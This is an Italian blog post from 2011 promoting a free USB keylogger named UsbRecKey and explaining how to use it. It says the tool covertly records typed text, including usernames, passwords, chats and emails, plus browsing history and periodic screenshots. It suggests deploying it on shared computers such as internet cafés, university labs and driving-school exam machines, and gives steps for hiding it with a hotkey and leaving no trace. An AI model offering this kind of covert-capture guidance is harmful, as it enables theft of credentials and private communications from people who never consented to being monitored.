giovedì 10 novembre 2011

Keylogger su usb gratis!

UsbRecKey è il più piccolo e il più efficace software keylogger da usare su pen drive USB. Il software è leggero e compatibile con qualsiasi sistema Windows. Registra automaticamente nella penn drive USB un file log con l'elenco di tutte le applicazioni in uso sul computer ed il testo digitato all'interno di tali applicazioni (conversazioni di chat, mail, documenti, nomi utente, password, etc) (Registratore di Tasti).
Registra le navigazioni effettuate con tutti i più comuni browser e salva le schermate del desktop ogni 30 secondi, ma è possibile scegliere un intervallo di tempo a piacere.
Il software è ideale per chi ha necessità di monitorare computer per un determinato lasso di tempo e di non lasciare alcuna traccia sul computer dopo il periodo di monitoraggio.
Un esempio può essere :
  • Aule Universitarie
  • Computer Scuola Guida (quelli usati per gli esami)
  • Internet Cafè
  • Aule Informatiche
Il software è completamente gratuito e non è necessaria la registrazione per il download. Per l'installazione è necessario indicare il percorso della pen drive USB (di almeno un 1 Gb) al resto penserà il software.

Per l'utilizzo invece bastarà inserire la pen drive in un computer con Windows XP / Seven / Vista o Windows Server, lanciare dalla pen drive il file UsbRecKey. Nella pagina principale del software impostiamo la frequenza di acquisizione dei print screen, poi premiamo Shift+F9 per nasconderlo e lasciarlo attivo in memoria.
Per leggere il file contenente tutte le registrazioni basterà andare nella pen drive USB e aprire il file di testo con la data che ci interessa, per esempio quello di oggi alle ore 16:21:20 sarà "log_11-16-11_16-21-20.txt"
Per vedere i print screen dello schermo basterà andare nella cartella SnapShots della pen drive.
 
Finestra principale di UsbRecKey - Software Keylogger su usb
 
Il software è gratuito ed è possibile prelevarlo da qui
Arrivederci al prossimo Articolo
OcchiolinoMichele Balzano

 

Post più popolari